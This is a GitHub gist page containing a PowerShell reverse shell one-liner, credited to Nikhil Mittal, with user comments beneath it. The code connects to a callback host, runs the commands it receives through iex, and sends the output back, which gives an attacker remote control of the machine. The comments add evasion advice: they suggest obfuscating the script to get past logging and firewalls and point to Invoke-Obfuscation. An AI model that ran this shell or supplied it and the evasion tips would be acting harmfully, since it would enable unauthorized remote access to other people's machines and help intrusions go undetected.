Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@ThunderSon

This comment has been minimized.

Copy link

commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.

@egre55

This comment has been minimized.

Copy link
Owner Author

commented Jul 9, 2018

hey, thanks for the heads up!

@chnz2k

This comment has been minimized.

Copy link

commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk, windows can log data connexion to the c&c server and some firewalls such as zone alarm block the packets.

@PLEASEFORGETME2

This comment has been minimized.

Copy link

commented Aug 7, 2019

@chnz2k how do you add obfuscation to a script ??

@egre55

This comment has been minimized.

Copy link
Owner Author

commented Aug 9, 2019

the Invoke-Obfuscation project is definitely worth checking out @PLEASEFORGETME2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.